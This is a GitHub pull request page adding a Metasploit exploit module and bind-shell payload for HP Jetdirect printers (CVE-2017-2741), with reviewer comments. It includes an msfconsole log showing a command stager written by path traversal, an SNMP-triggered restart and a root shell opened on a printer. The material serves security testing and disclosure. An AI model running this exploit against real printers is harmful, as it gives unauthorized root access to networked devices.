Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

HP Jetdirect Path Traversal Arbitrary Code Execution CVE-2017-2741 #9364

Merged
merged 19 commits into from
Aug 24, 2018
Merged

HP Jetdirect Path Traversal Arbitrary Code Execution CVE-2017-2741 #9364

merged 19 commits into from
Aug 24, 2018

Conversation

mkienow-r7
Copy link
Contributor

@mkienow-r7 mkienow-r7 commented Jan 1, 2018
edited by wvu
Loading

Adds exploit module for HP Jetdirect path traversal arbitrary code execution (CVE-2017-2741) and BusyBox telnetd bind TCP Unix command shell payload. The payload uses the recently introduced CommandShellCleanupCommand advanced option from #9353.

Verification

  • Start msfconsole
  • use exploit/linux/misc/hp_jetdirect_path_traversal
  • set rhost <hostname>
  • exploit
  • Verify a command shell session is opened
  • Press Ctrl-C and respond yes to abort the session
  • Verify telnetd is not longer listening on LPORT
  • Document module documentation/modules/exploit/linux/misc/hp_jetdirect_path_traversal.md
  • Document payload documentation/modules/payload/cmd/unix/bind_busybox_telnetd.md

Demonstration

The following demonstrates the exploit against a vulnerable HP OfficeJet Pro 8210 printer.

msf > use exploit/linux/misc/hp_jetdirect_path_traversal
msf exploit(linux/misc/hp_jetdirect_path_traversal) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(linux/misc/hp_jetdirect_path_traversal) > exploit

[*] 192.168.1.107:9100 - Exploiting...
[*] Started bind handler
[*] 192.168.1.107:9100 - Connecting to port 9100...
[*] 192.168.1.107:9100 - Attempting to write command stager...
[+] 192.168.1.107:9100 - Successfully wrote command stager to 0:/../../rw/var/etc/profile.d/dLDZtDsh.sh
[*] 192.168.1.107:161 - Connecting to SNMP port 161...
[*] 192.168.1.107:161 - Initial value of prtGeneralReset OID 1.3.6.1.2.1.43.5.1.1.3.1 => 3
[*] 192.168.1.107:161 - Attempting to restart printer via SNMP...
[*] 192.168.1.107:161 - Set prtGeneralReset OID 1.3.6.1.2.1.43.5.1.1.3.1 => 4
[*] 192.168.1.107:161 - Current value of prtGeneralReset OID 1.3.6.1.2.1.43.5.1.1.3.1 => 3
[*] 192.168.1.107:161 - Printer restarting...
[*] Command shell session 1 opened (192.168.1.101:38141 -> 192.168.1.107:4444) at 2017-12-31 21:09:40 -0600

��������
[root@HPC2A3FB ]# id
id
uid=0(root) gid=0(root)
[root@HPC2A3FB ]# uname -a
uname -a
Linux HPC2A3FB 3.14.32 #001.1614A Wed Mar 30 16:58:30 PDT 2016 armv7l GNU/Linux
[root@HPC2A3FB ]# ^C
Abort session 1? [y/N]  y

[*] 192.168.1.107 - Command shell session 1 closed.  Reason: User exit
msf exploit(linux/misc/hp_jetdirect_path_traversal) >

Port Scan Before Aborting Session

$ nmap 192.168.1.107

Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 21:17 CST
Nmap scan report for 192.168.1.107
Host is up (0.0011s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
515/tcp  open  printer
631/tcp  open  ipp
4444/tcp open  krb524
8080/tcp open  http-proxy
9100/tcp open  jetdirect

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds

Port Scan After Aborting Session

$ nmap 192.168.1.107

Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 21:18 CST
Nmap scan report for 192.168.1.107
Host is up (0.0011s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
515/tcp  open  printer
631/tcp  open  ipp
8080/tcp open  http-proxy
9100/tcp open  jetdirect

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

🔺 Only one HP OfficeJet Pro 8210 printer was bricked in the development of this exploit module.

@wvu wvu self-assigned this Jan 2, 2018
@wchen-r7
Copy link
Contributor

wchen-r7 commented Jan 4, 2018

Excellent job @mkienow-r7

wchen-r7
wchen-r7 reviewed Jan 4, 2018
View reviewed changes
modules/exploits/linux/misc/hp_jetdirect_path_traversal.rb Outdated
},
'Author' => [
'Jacob Baines', # Python PoC
'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ah, next time remember to add your e-mail to https://github.com/rapid7/metasploit-framework/blob/master/.mailmap, that way you won't need to manually put your e-mail here all the time :-)

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Awesome!

modules/exploits/linux/misc/hp_jetdirect_path_traversal.rb Outdated
def exploit
begin
print_status("Exploiting...")
if target.name =~ /Unix/
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hmm, excuse me if I'm missing something obvious.... as far as I can tell this condition is always true, right? Because you only have one target that is Unix. Is the module actually using the else block?

Copy link
Contributor Author

@mkienow-r7 mkienow-r7 Jan 4, 2018
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, that is currently true. I was hoping we would eventually be able to get an ELF stager to run, which would use a different target name and drop into the else calling the execute_cmdstager method.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Gotcha! :-)

documentation/modules/exploit/linux/misc/hp_jetdirect_path_traversal.md Outdated

Impacted printers have a firmware version below 1708D.

| Product Name | Model |
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Have you tried to view this with info -d? I don't think this format works well :-(

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I didn't. Thanks for pointing that out as I had quickly created Markdown that I tested with GitHub.

@mkienow-r7
Copy link
Contributor Author

mkienow-r7 commented Jan 6, 2018
edited
Loading

I forgot to note that all corrections per my conversation with @wvu-r7 are complete.

wvu
wvu reviewed Jan 6, 2018
View reviewed changes
spec/lib/rex/proto/pjl/client_spec.rb
allow(tmp_sock).to receive(:put).with(an_instance_of(String))
allow(tmp_sock).to receive(:get).with(Rex::Proto::PJL::DEFAULT_TIMEOUT).and_return(response)
tmp_cli = Rex::Proto::PJL::Client.new(tmp_sock)
expect(tmp_cli.fsdownload("Miscellaneous Data", "1:root/.workspace/.garbage.", is_file: false)).to eq(true)
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

https://getyarn.io/yarn-clip/73be532d-f0fe-4a7a-ad88-656a0e5c13dc

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

https://getyarn.io/yarn-clip/3d6afe00-86c4-4e6d-ba23-3c2a8266dabd

@mkienow-r7 mkienow-r7 mentioned this pull request Jan 10, 2018
Merged
@asoto-r7
Copy link
Contributor

asoto-r7 commented Jul 2, 2018

Unfortunately, a conversation from Slack wasn't not transferred here, so I'm catching up now.

Per a discussion with @wvu, this PR is blocked, pending landing of #9356. I had issues testing #9356, and dropped the ball, which I'm just picking up this week. For details:

#9356 (comment)

@wvu wvu mentioned this pull request Aug 23, 2018
Open
@mkienow-r7
WIP - hp officejet pro exploit, enhance PJL lib
c0c3e12
@mkienow-r7
Add bind_busybox_telnetd payload, misc cleanup
df18e35
@mkienow-r7
Rename module, exploits multiple printer models
81f1555
@mkienow-r7
Clean up module and payload
e21ea41 
Update module info, remove intermediate ARCH_ARMLE target, simply
options and add cleanup command so that the payload kills telnetd
@mkienow-r7
Remove final debug output
b1a308f
@mkienow-r7
Add module and payload documentation
77b7728
@mkienow-r7
Remove unnecessary explicit msf/core require
7c03454
@mkienow-r7
Use string interpolation over concatenation
dafa62d
@mkienow-r7
Add uname to module documentation scenario
18712c2
@mkienow-r7
Remove payload RequiredCmd and reformat info
70a0b9b
@mkienow-r7
Restore original rport value
c5958c6
@mkienow-r7
Fix documentation markdown table format
ee6bf7a
@mkienow-r7
Add test for PJL fsdownload from string data
81ec723
@mkienow-r7
Omit parentheses for no argument method calls
934bb38
@mkienow-r7
Modify SNMP null and error handling
9c05f14
@mkienow-r7
Fix SNMP Null class comparison
961769c
@mkienow-r7
Functional decomposition refactor and cleanup
56433c8
@mkienow-r7
Add note about unauthenticated telnetd service
ecc6c47
@mkienow-r7 mkienow-r7 force-pushed the cve-2017-2741-hp-officejet-pro-exploit branch from 70718b8 to ecc6c47 Compare August 23, 2018 19:51
@wvu wvu merged commit 7a53470 into rapid7:master Aug 24, 2018
wvu added a commit that referenced this pull request Aug 24, 2018
@wvu
Land #9364, HP PJL/SNMP CVE-2017-2741 exploit
672dbb7 
Finally!
@wvu
Copy link
Contributor

wvu commented Aug 24, 2018

Release Notes

This adds an exploit for CVE-2017-2741 against HP printers using the PJL (JetDirect) and SNMP protocols.

msjenkins-r7 pushed a commit that referenced this pull request Aug 24, 2018
@wvu @msjenkins-r7
Land #9364, HP PJL/SNMP CVE-2017-2741 exploit
415379e 
Finally!
@mkienow-r7 mkienow-r7 deleted the cve-2017-2741-hp-officejet-pro-exploit branch August 24, 2018 13:27
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wchen-r7 wchen-r7 wchen-r7 left review comments

@wvu wvu wvu left review comments

Assignees

@wvu wvu

@bcook-r7 bcook-r7

Labels
docs module payload
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@mkienow-r7 @wchen-r7 @asoto-r7 @wvu @tdoan-r7 @bcook-r7